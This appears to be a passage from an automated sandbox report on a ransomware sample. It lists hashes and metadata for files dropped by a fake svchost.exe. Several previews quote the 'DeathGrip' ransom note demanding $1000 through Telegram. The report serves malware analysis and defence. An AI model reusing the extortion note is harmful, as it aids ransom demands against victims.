                                                          SSDEEP:24:VWpERRG17AJHFEjsGEHekwAlOJBYy7+9Sw8+sb0boPfHSzQLtxPkSWoiwslfIW1L:VSE2KHFzNHeduOJ2yq0w8+sb0bA/cQ3c
                                                          MD5:649124421ECB23FA183F23756C9F139E
                                                          SHA1:50D5307628D0A80EF3DB2501A5161ED109D96AE4
                                                          SHA-256:1747DCF69D070DC28D69F8209A4D2E62E304F4552C32698436545C9DA1400B24
                                                          SHA-512:CBA565223C9B375A842569EE2670BA9628A36EAF7E9F0DF37B847D25D0E98730750A4878CA6EE2EDA38219D928A5B69C5AC0057C5314FBBC80978E3321E96E50
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.745191256421188
                                                          Encrypted:false
                                                          SSDEEP:24:UV+CYYWxiEiYqXGVobf+NzbWMZyPXISZby0R7rofDglrgPyLvjnJou3KffEQ:UV+pizXGcS/xZyPYSnHofariKWjffEQ
                                                          MD5:880A9E347ED21CDAAA9EB7EF1103364E
                                                          SHA1:D47E43C7696750B6D3B6C8F9C81C1EEBC68EA27E
                                                          SHA-256:58477F0660732DFC8536068E1A83472F736FAA9046820268D38A70018CAD27BB
                                                          SHA-512:A028CC0281B600DC40D691090BC8365F9A3F04BB77371F444B632C75AE7BC78DFB0E95DA9F0E03EC90EEE2E9A31A45F5527D8528F419676AE3B31CAC60EC8AB5
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1856
                                                          Entropy (8bit):7.849930948190031
                                                          Encrypted:false
                                                          SSDEEP:48:MPDCPK9i5o74eJKa2RBzs91dHWy+/9bhdDmhHUn9whY:0qK9H4eYhI7HWD9bhYh09
                                                          MD5:28493637E6F0AC25AD07A418BAA3A292
                                                          SHA1:F2B81C8734FA48150DC7076AE5D8493DA481DDBA
                                                          SHA-256:7E61D13A68DD4D48D6BC280AA4C42324A78FCB9E4CE20BC0240ACBC3E9F1AF22
                                                          SHA-512:070CA1FB46D0B424B76BC605EFD8279468DBC35325896C6756C98462A1C2460B66ABEE22BAD535AB99E0D3F96CA744792149BA88F916132547EB68B57C9FE99E
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.7305650097242715
                                                          Encrypted:false
                                                          SSDEEP:24:LuKH1q2yyWLHNhLtJLpjGiwWThtSzUlNL+M4eLoyVjjoNqz/k:L7JWbfLtNOWhtSgjJoGnYR
                                                          MD5:79AE2D2EE626D98B9A7DA4BADD8BC9BE
                                                          SHA1:584485A9249E74FBB9CBD5A83F8806157F0EB0E6
                                                          SHA-256:8189463EFE0CBB6C3F55ED12AB55C743E7A637C851244A6ECF920E15CDD34A5D
                                                          SHA-512:4D0D6AC3F584754B51FEFB7411E215F0A8236C456D5114F7B56CF25B79C008DAE5AD61F5030B5C884E50D47F2C1380B156A54D96ADE32AC16D4BFD5EDEE25942
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.754621852468471
                                                          Encrypted:false
                                                          SSDEEP:24:EFISJl/P9Hn8giDNzD1Qc+czayat4QgF2gv1ja3E3Xkgl7ordQ1T2:MISJl/1XiDQ3cutFEj1P3UglAP
                                                          MD5:4B2689DD7FC162728696FEB94085E31D
                                                          SHA1:877CB1903B1AA1676B57B7C1FA3D7F6BBD4EA36B
                                                          SHA-256:FFD757B75D46036953CF69F948474EE0B37C37CC82CE60F441D5F132B2EBD0E7
                                                          SHA-512:F8CF4779CC08B93B84F973C72AE1B93450E0DAE9FA13E1DF014EABF000BAAFDB0E3AA93A9E8BEE075E3BE7C94919BA0A7B80BE6889FFE411DC6DD48667CFAA38
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1488
                                                          Entropy (8bit):7.755290159977447
                                                          Encrypted:false
                                                          SSDEEP:24:ghTXUx6IBAi8MceAIkDBxdiYUPIBhx/YVzpjyVsWe6HE5qao0y9cLO3my5LttL5t:ghDUGHDeAIkDEBOh1cByGWepqao0yGLG
                                                          MD5:DD0694F28A8581606BB0A3FBE6372DCB
                                                          SHA1:EF2E874CC1A2EEDD550C62316ADC2C6B0A4B5DE4
                                                          SHA-256:938AB44CFF5C450682491E00BFDD6EDBCDC253E76012191DE7B093E9BA194E87
                                                          SHA-512:711274AB86313A358C143CDDF018C5B38C6BC0BEE8CF31DDD176455968462F8B02C7FB67716F84F4F681A9DD781EF1E34C4D9AC7BD6A40E92D5657D67AA1521F
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1424
                                                          Entropy (8bit):7.7775871875534355
                                                          Encrypted:false
                                                          SSDEEP:24:iyzSwiTxaigvAr5Z93jiyrz9EcMj7WqDxePZsvpqicWBjjbDMCFZTJrMvk1:iI6xa3vO5Z93jiQ9uuqNePD8pMMdrJ
                                                          MD5:846476C4E134173DF5802AD6D53C4FFC
                                                          SHA1:D6408BD9F70EA39A9EB4362C68333D0FFFFDFF3F
                                                          SHA-256:A8A26E7825ADEB40B4FEF36AB433E0EAABEC2E6B16C28D9B19169DFF2442BDA6
                                                          SHA-512:6FBC0073D06F406D9CC36B89A9587747D19967B70FB6956F170870E3BC8C63B461D0F8068CBB27EDD6762761ACC63F9D807CE8452285B015D63509DE142A22B7
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1536
                                                          Entropy (8bit):7.778352778487553
                                                          Encrypted:false
                                                          SSDEEP:24:AmbjvYtOVEYO+tKtKITolhL8ymCvXEn91t/tjlP8IWMeDrCIjQ1X6LQUjnYww90L:RXfVxNosLTL8ymCPCrKZDrCIMZqQU8w7
                                                          MD5:A5E9982372B4D771C3EB2174B469C339
                                                          SHA1:237367F71DFB36F9EE091B6A7768E45826024419
                                                          SHA-256:D5CBB0BF38FF8419FA0317293A19219D767E54141B230EC3E687C883BFD48C52
                                                          SHA-512:E514E201FA1C0AB27F7CEC6F287C3F26EF13A195BA0DCBB7C0B5DF2A090C551ED10E35893BBB118A527BBE9EC7B534EDA599499C940DBD4DFEF1D0619B119C2A
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.757459995382975
                                                          Encrypted:false
                                                          SSDEEP:24:wIp7k+b0xmCXW2PYMB8LjH9lLaAE/MjtxtxnVc9v4SuckigaKAm2+Y:wIFTCmMWQoP3LhRjblcepriVc2n
                                                          MD5:3664E55B3A7E5B24BAB4455C1D69374A
                                                          SHA1:FF12344B948F1593D4012257C2C0BA09E7405EBB
                                                          SHA-256:65B8ABD0E3312B53EB37230907F454B0C3FE4218AEA3CB787F5858080537CD63
                                                          SHA-512:263C8E630216B952E02FF53226C1A3A0A7897A24D499AA1AA320CB10F86EAC490C6B9FCCC9D6F420C713DE6BBE88A7617B879C46F61F2E2C3B1554B806F3EC4B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.7609989423045525
                                                          Encrypted:false
                                                          SSDEEP:24:NIeTJA7O2BrlEEChiOjuiVF2xs17q9w2YPuYf66eTAdYQW12Tqr8Mx2r:+eTJAS4rlR2rMxs49w2YZCJJQW1Gqr8x
                                                          MD5:56591FB444A35E9E126D2E621BD9E43D
                                                          SHA1:E411FDD88957417FE1134674D20BF5FC671260EF
                                                          SHA-256:331CE946F01D338AB68239440C8B5F987AD80C93E05179036FDD137005D8725E
                                                          SHA-512:F32388BF02E73033B599B54B95ABCCDEDB550AD3E83487C1CB93CC8B55E41CBC8C0973B3C27EFD8D89DB6BFEA73ECAAAEDE502ADA6646FEEB8365554FB98DD15
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1936
                                                          Entropy (8bit):7.829813206558995
                                                          Encrypted:false
                                                          SSDEEP:48:q6mqDEyqBe0FOPMTmo0sjoIsTw112ao4jtTcN:hpx90sPMTkrImUl9cN
                                                          MD5:1F88EFC743CFEFCB41868287B65B4009
                                                          SHA1:995121497481246696993694E2CDCDD0AD9DD21B
                                                          SHA-256:841564932CFA3D392D8E2ED533FAB20EF403D648938ABA9604CD0A1BB5AEF2E5
                                                          SHA-512:552173C9563BA459993F2A50B1BA41C83B67B22895A232C07DA84873C31E3798E1EE0BA02308AB8182AEA073317368105D3A7BC79D181399EF3245A49AC96F5C
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1440
                                                          Entropy (8bit):7.752124262818774
                                                          Encrypted:false
                                                          SSDEEP:24:KNe7f4hrC/rCfkhw8sEjjiwZeBERbGj5eivisfnCzs12m0YMYwz+zs8tr3b:KAFrkkhw0fSBEBiVCzm0Ynwz18v
                                                          MD5:D73621A328DD410E828C5E0FE3A13894
                                                          SHA1:60BE8DD59BF090F791A41EF8C19F66E7CF89A6CA
                                                          SHA-256:F7B1EE53416061904A7A3CF022BE3B9DED252A8A81EF4E6AD36471B5D979FD33
                                                          SHA-512:E1885562D13918A6847ADE81EE4C44FC1F16B8D500AEA3F67C5941E9157200428A0BAFD00AC962CF177AB3B936B7A7A554F1DDD4655532846B1B2E9130B88B26
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1936
                                                          Entropy (8bit):7.8401600264714135
                                                          Encrypted:false
                                                          SSDEEP:48:nW3L4LuUCVkX2olAPHNT7R1/nwQ5/2gbJ:90SXmd7/wgJ
                                                          MD5:F151FA7972B42E2C586A1E58BD4372CD
                                                          SHA1:E63E7C6436C00C5F70B170843EE4792B42548A1E
                                                          SHA-256:00272EB4D2F4BC278A295B1EAA750459D057700AC167B6B398B2AE23AFC047DA
                                                          SHA-512:DD6645BFBB6CD05F35EBB8BB6B946102A8FB24D5A516B23E0FD79578F21B1AA9E6857540E5E80B0AE7FC6DED23563CF008EA71B838E9A73C7D93A10E8DE186DA
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.7156097963440065
                                                          Encrypted:false
                                                          SSDEEP:24:qaVpBmxOaeeQWJF3tnCNSxMpMikYSBvV0uIPsYABmlYzs6HkN1iePxEP:TpBIfjf3VCs1HBtV16sYABhJo1iePxEP
                                                          MD5:490BB435A7146EF3A61C6E3C6CB44A55
                                                          SHA1:C1F2738CD1682910B859037B35DF39382458C82E
                                                          SHA-256:3D2967CD85221C5678444CA89C8D23B59F1F16AC590DBB4BBEF9A5DC3C000D41
                                                          SHA-512:14F3DC4FA01F803A7EC77DD1699862AC3E87639641C214BE5D22A22882B05358B1E7D3E4E9091046EEB47DBF0F8C30BA66D970C97CF72A0C8FA7196D8EB0B044
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1936
                                                          Entropy (8bit):7.842420747965826
                                                          Encrypted:false
                                                          SSDEEP:48:2FwbO/iwJKU6BD/tMC2IkDlhsq8ERZIB8:2KS/iX/B7tMek5hpRZIy
                                                          MD5:07B9743A946F579B2E6678AD0444716D
                                                          SHA1:982A9FC87E280014AF8EBC246B950A096B9AC1E2
                                                          SHA-256:BD1DBD3A9F929EC524D15F65F94AEA17F4469EB8050768D555474DEFC2E5218B
                                                          SHA-512:BFA95F8D30AC26422E314C4CCCB28F11D8C90CCA3371807C463B619084D76816CA39566E11AAE2A006BD2B3B7A6D74F3C11ECE9D651324ADCB577F250A413E4D
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.745702753166535
                                                          Encrypted:false
                                                          SSDEEP:24:8VMV2SEjoyh/khUlphnMsblxxgEgwwrtEyet3uB3RY90:X4nhPisbMwwr2yet37W
                                                          MD5:E1139EF4D8BFB1E50B7136E8E63D7D86
                                                          SHA1:4C264E69F7243554DDECCB26D7B14078B76C46AC
                                                          SHA-256:92368FC9EB6F3F1EC95285CD000B7DA4D60186C4D3A9815359D733F0DCB72170
                                                          SHA-512:B80AFA841A716099AA970E546B42D114A539AC640C370923355C88EE9962B1CCE1E82F299DB41AA6AC2D9866048F2A9584048D809A86BDDF6BEC66888723191F
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1936
                                                          Entropy (8bit):7.840709180158932
                                                          Encrypted:false
                                                          SSDEEP:48:fNB5KvXLqFo5Nm2ziAzh2sdS3NY2MqEl7S2893fmIfk3Gx5KhRBp9sYTS76f:fTM/Lqq5YsCNY2eBkvmIs3UKhdDc6f
                                                          MD5:DCD8830D0CD5D2F9687329E764861586
                                                          SHA1:C1D4FAC0A87C094B381CFC7200F0F9EB51F743D2
                                                          SHA-256:55590D71C407F0B84695774EB49E25A498BADF45DEF42CD1A153A74147A009DC
                                                          SHA-512:EAE257275974D5034B471952BDF6038FF462D9396AE226D0A26011DF338FFC7D3DB27B73920102BD654C4E6D9C1035388E5230DAA92E8794C10A47D658BD059E
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2896
                                                          Entropy (8bit):7.915882827256658
                                                          Encrypted:false
                                                          SSDEEP:48:kpxqTPbxqgvJ9ogS1oLk0hLKIy46/UJBnFoG7u++OCOu+irgs8iPMpoEIdyaZQMR:kpwTP9qgvLodIybMpo2udOygs8GMGMiX
                                                          MD5:F332DAC13BFC224D3D14A9911DB53986
                                                          SHA1:B93A6493AAC23F5FF13481CC173447FE260D4F32
                                                          SHA-256:03A0088D5C728E99E282FE0E7E704EFE3243E551986F684252D1AA6D11E89CAD
                                                          SHA-512:D9582725CC0B5DB05CE27DBABFDA80A1863D579DF582D6E8B3B44536F38E1E43C844833D32DBB93A2E057598609B3A95DD40B1E7D2F8A82E6091B8F41325C020
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2416
                                                          Entropy (8bit):7.872157710396021
                                                          Encrypted:false
                                                          SSDEEP:48:rS61Urh50fBBLxI67ahcFPDviMYM+WqJ4+F566PeBcD:r71UtOnLvVYFV
                                                          MD5:9738FD15C1DB5E19F08E05FEEA92B390
                                                          SHA1:9BE96F61AB4A8202B4C98503E74909A75F8C0C6C
                                                          SHA-256:40AE2950FB421EB06A43760A48ABB23A1FB4759E25C280147B42D52C8AAD0D5F
                                                          SHA-512:9340A8EF4687D370208F4800C0BA1757037E1825F0DB224A16C11F3A1D68486890688B2E34113CE87017FA53302A26E0256400F24BE53FC61F9A8F2D3A81EB69
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1360
                                                          Entropy (8bit):7.748761826854886
                                                          Encrypted:false
                                                          SSDEEP:24:kggcQMdoByck7WhRSLROY6HCM+2GdBK4K1/5auDJihnJShEPMQuAhJwM+Q46UodR:McDyK7WSLcY+CUEKJihn7MQuAYMZ4IdR
                                                          MD5:79EDC3C53127F7F1903352A8BE387585
                                                          SHA1:5293A99443C248BA0EF41AF19715355B086C7408
                                                          SHA-256:381B9D351533914972B4005278F94A9C5B5F372215C1B8BB1BFF568AA9946F8E
                                                          SHA-512:65D1DF72A85C526D23BE19E7B427C451C13AD3489A65E90B879D3969CC9C1E9CE64A2452ADC66669F239CC3711D522C178E753AD19AD07B8D07E28E667DF43E9
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:true
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
